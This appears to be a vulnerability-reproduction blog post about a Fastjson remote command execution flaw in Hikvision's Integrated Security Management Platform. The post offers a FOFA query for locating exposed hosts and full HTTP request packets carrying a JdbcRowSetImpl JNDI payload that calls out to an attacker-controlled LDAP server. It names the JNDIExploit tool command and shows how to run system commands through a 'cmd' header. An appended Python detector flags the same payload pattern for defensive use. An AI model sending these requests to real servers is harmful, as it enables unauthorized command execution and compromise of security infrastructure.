[Vulnerability Reappearance] Hikvision Integrated Security Management Platform Fastjson Remote Command Execution Vulnerability Reappears


Foreword

Hikvision's comprehensive security management platform has a Fastjson remote command execution vulnerability. An attacker can construct a malicious payload that executes commands on the server and obtains system permissions and sensitive data.


Statement

This article is only for vulnerability reproduction and technical research. Do not use the attack methods described in this article for unauthorized penetration attacks. Any consequences have nothing to do with this article or its author, remember!!!

1. Brief Introduction of Hikvision Integrated Security Management Platform

The comprehensive security management platform is designed around the concept of a "unified software technology architecture" and uses business component technology so that the platform can scale elastically as business needs grow. It is applicable to general comprehensive security business across the whole industry: it integrates and centrally manages the resources of each subsystem, and provides unified deployment, configuration, management and scheduling.

2. Vulnerability description

Hikvision's comprehensive security management platform has a Fastjson remote command execution vulnerability. By sending a crafted JSON request, an attacker can execute system commands on the target server and obtain system permissions and sensitive data.


3. Affected versions

Unknown.

4. Vulnerability reproduction

FOFA: app="HIKVISION-Comprehensive Security Management Platform"

The vulnerability request packet is as follows:

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

First, test whether the LDAP lookup produces a DNSLog callback. If the DNSLog platform receives the request, there is a high probability that command execution is possible.
After confirming that DNSLog receives the request, the vulnerability can be exploited further. Use the JNDIExploit-1.3-SNAPSHOT.jar tool and run the following command:

Tool download address: go to download

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSip

Then add a cmd header to the request packet in Burp, e.g. cmd: whoami. The cmd header carries the system command to execute. In the payload below, replace the ldap address with your VPSip/Basic/TomcatEcho, as follows:

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

Send the request in Burp and the command is executed successfully!!!

5. Remediation

The vendor currently provides fix patches; download the patch matching your version from the official website.
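As an added defensive check that is not part of the original post, the following detector flags JSON request bodies matching the Fastjson JNDI pattern shown above: the @type autotype key, the java.lang.Class/val trick that primes the autotype cache, and a com.sun.rowset.JdbcRowSetImpl object whose dataSourceName points at an ldap:// or rmi:// URL. The gadget list and the sample bodies (with a placeholder callback host) are constructed for this example.

```python
import json
import re
from typing import Any, Iterator

# Indicators taken from the request packet above. The gadget list is an
# assumption for this example, not a vendor-supplied or exhaustive list.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_URL = re.compile(r"^(ldap|ldaps|rmi)://", re.IGNORECASE)


def _walk(node: Any) -> Iterator[dict]:
    """Yield every JSON object in the document, depth first."""
    if isinstance(node, dict):
        yield node
        for v in node.values():
            yield from _walk(v)
    elif isinstance(node, list):
        for v in node:
            yield from _walk(v)


def fastjson_jndi_indicators(body: str) -> list[str]:
    """Return the indicators found in one JSON request body (empty = clean)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []  # not JSON at all; outside the scope of this check
    found = []
    for obj in _walk(doc):
        t = obj.get("@type")
        if t is None:
            continue
        found.append(f"autotype:{t}")  # any @type key deserves a look
        if t == "java.lang.Class" and obj.get("val") in GADGET_CLASSES:
            found.append(f"class-cache-priming:{obj['val']}")
        if t in GADGET_CLASSES and JNDI_URL.match(str(obj.get("dataSourceName", ""))):
            found.append(f"jndi-lookup:{obj['dataSourceName']}")
    return found


# Constructed sample bodies: "attack" mirrors the request above with a
# placeholder callback host; "benign" is an ordinary login-style request.
SAMPLES = {
    "attack": '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
              '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
              '"dataSourceName":"ldap://ATTACKER_HOST:1389/Basic/TomcatEcho","autoCommit":true}}',
    "benign": '{"username":"alice","password":"***","ticket":"abc123"}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, fastjson_jndi_indicators(body))
```

In practice the check would run in a WAF rule or a log pipeline over POST bodies to /bic/ssoService/v1/applyCT, with the jndi-lookup and class-cache-priming indicators treated as high severity.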


Source: blog.csdn.net/weixin_46944519/article/details/130420770